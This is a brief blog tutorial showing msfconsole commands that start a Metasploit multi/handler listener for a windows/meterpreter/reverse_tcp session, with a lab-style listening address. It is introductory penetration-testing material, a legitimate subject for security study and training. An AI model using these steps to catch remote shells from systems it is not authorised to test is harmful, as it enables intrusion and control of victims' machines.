how to create a quick meterpreter session using /multi/handler

Posted by

There’s some steps to complete the listener,

#1. open Metasploit

Screen Shot 2019-11-03 at 03.09.55
msfconsole

#2. set the following parameters,

msf5> use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 10.10.14.24
lhost => 10.10.14.24

msf5 exploit(multi/handler) > run

it should look similar the following example,

Screen Shot 2019-11-03 at 03.19.56
successful.
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s